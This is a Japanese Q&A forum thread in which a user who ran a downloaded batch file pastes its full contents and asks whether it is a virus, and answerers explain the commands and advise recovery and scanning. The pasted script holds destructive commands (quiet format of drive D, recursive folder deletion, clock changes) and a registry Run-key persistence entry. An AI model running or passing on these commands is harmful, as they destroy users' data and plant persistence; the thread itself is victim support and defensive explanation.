• 締切済み

これはウイルスでしょうか?

DLしたbatファイルを実行したらウイルスに感染しました。 等のフルダが大量に作られ、PC内の時計がいじられました。 avastを入れてるのですが、何の反応もなかった為躊躇いもなくクリックしてしまいました。 時計がいじられてしまったので、反応がなかったとはいえ心配です。 batをtxt化しましたので、どなたか分かる方いましたら今後どうすればいいかよろしくお願いします。 date 2001-01-02 time 22:20:10 rmdir "C:\Program Files\CAPCOM" /s /q rmdir "C:\Program Files\NtreevSoft" /s /q rmdir "My Documents\My Downloads" /s /q rmdir "My Documents\受信したファイル" /s /q rmdir "Favorites" /s /q cd デスクトップ move "モンスターハンター フロンティア オンライン.lnk" "お前はモンスター 俺がハンター 風呂んティア.lnk" mkdir ウイルスに感染しました ウイルスに感染しますた ウイルスにのっとられました 今すぐウイルス対策ソフトを実行汁 個人情報丸出し乙 1時間後に再起動しますw メール見ちゃらめぇ お前のメッセ登録数すくないのうww少ない脳www 馬鹿がまた1人釣れました もう二度と人間を信じない方がいい・・・! 人間・・・食う 貴方の御家に後で電話掛けますわ format d:\ /v:ウイルス増殖用ドライブ /q copy "up3722\RE8.5_install.bat" "C:\WINDOWS\system32\re.bat" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v re8 /f /d C:\WINDOWS\system32\re.bat

みんなの回答

  • waros99
  • ベストアンサー率29% (162/544)
回答No.4

こんにちは。 普通、どこから落としてこようとVirusTotalとかかけますよ。 最近はロダにもウイルスありますね。 batなら普通に中身見れるから確認すればよかったのに。 リカバリですな。ちなみに、ボクは今日システムのイメージバックアップ取ったとこです。 ※お勧め 「Folder LockBox」 「Acronis True Image」

すると、全ての回答が全文表示されます。
  • yoshi-thk
  • ベストアンサー率38% (2059/5283)
回答No.3

>P2Pを利用していなくても個人情報の漏洩というのは起きるんでしょうか? 「山田オルタナティブ」ってウイルス知ってますか? その未知の亜種に掛かっていると、ウイルス対策ソフトでも分からないです。 一応そのウイルスについての記事を紹介するので確認してください。 INTERNET Watch HDDの全内容を公開する「山田オルタナティブ」、Winny利用者以外も注意 http://internet.watch.impress.co.jp/cda/news/2006/03/03/11106.html

gaianto
質問者

お礼

ありがとうございます。 見てきましたが、感染済だと気付きようもないみたいですしどうしようもなさそうですね・・・

すると、全ての回答が全文表示されます。
  • yoshi-thk
  • ベストアンサー率38% (2059/5283)
回答No.2

No1方の今回のリカバリは、ハードディスクをクリーンフォーマットして、OS等を入れ直すという事です。 僕もNo1の方の意見に賛同します。 ハードディスクのフォーマットは、それ用のソフトがなくても出来ますし、 今回の場合は、他のウイルスが入っている可能性があるのでクリーンフォーマットを勧めるのです。 システムの復元で、完全に駆除出来る可能性はないです。 何でもタダで済まそうとしたのですから、相応の苦労をした方がよいでしょう。 それから、そのようなウイルスに感染したとすれば、どのような場所から入手したか分かります。 場合によっては、P2Pソフト上にあなたの情報が漏れている可能性もあります。 今後は怪しいものは、ダウンロードするべきではないです。

gaianto
質問者

お礼

ありがとうございます。 ファイルはアップローダーからDLしたもので、P2Pから落とした物では無いです。 avastを入れているのですが警告もなかったため安易に実行してしまいました。 P2Pを利用していなくても個人情報の漏洩というのは起きるんでしょうか? avast、ウイルスバスターでオンラインスキャンをしたのですがウイルスは発見されませんでした。 クリーンフォーマットは色々事情があって恐らくできないと思います。 とりあえずre.batをレジストリから削除してみましたが・・・

すると、全ての回答が全文表示されます。
  • Cupper
  • ベストアンサー率32% (2123/6444)
回答No.1

たいしたことはされていませんが、いくつかのフォルダを削除されていますね。(rmdir) Dドライブもフォーマット(初期化)されています。(format) さらに起動時に不明なプログラムをインストールするように仕掛けられているようです。(reg add) ・・・質問者が個人で復旧を試みるのでしたら、リカバリしたほうがスッキリ&確実ですよ。 マイドキュメントに保存しているデータも削除されているようですので、この際 購入時の状態にまで戻してみるのも一興です。 まあ、いい経験をしたと考えるようにしましょう。

gaianto
質問者

お礼

ありがとうございます。 Dが初期化、マイドキュメントが削除されてるらしいですが、 Dをサッと見る限り、何も消されたようには見えないのですが・・・ マイドキュメンドも、質問内容のtxtに「受信したファイル」があったので見てみたのですが、 消されていないようです。Downloadsは空になっていますが、元から空だったような・・・ リカバリというのは、リカバリディスクを使っての事でしょうか? システムの復元ではどうにかなりませんか?

gaianto
質問者

補足

書き込んでから思ったのですが、もしかして再起動してからformatやrmdirが実行されるんでしょうか? だとするとまだ再起動してないので・・・ できれば個人でなるべくお金をかけずにbatを実行する前の状態まで戻したいのですが 市販のリカバリを使うしかないんですかね・・・

すると、全ての回答が全文表示されます。
  1. カテゴリ
  2. インターネット・Webサービス
  3. セキュリティ対策・ネットトラブル
  4. ウィルス・マルウェア

関連するQ&A

注目のQ&A

カテゴリ

OKWAVE コラム

あなたにピッタリな商品が見つかる! OKWAVE セレクト

専門家に質問してみよう

職業から探して質問する
質問する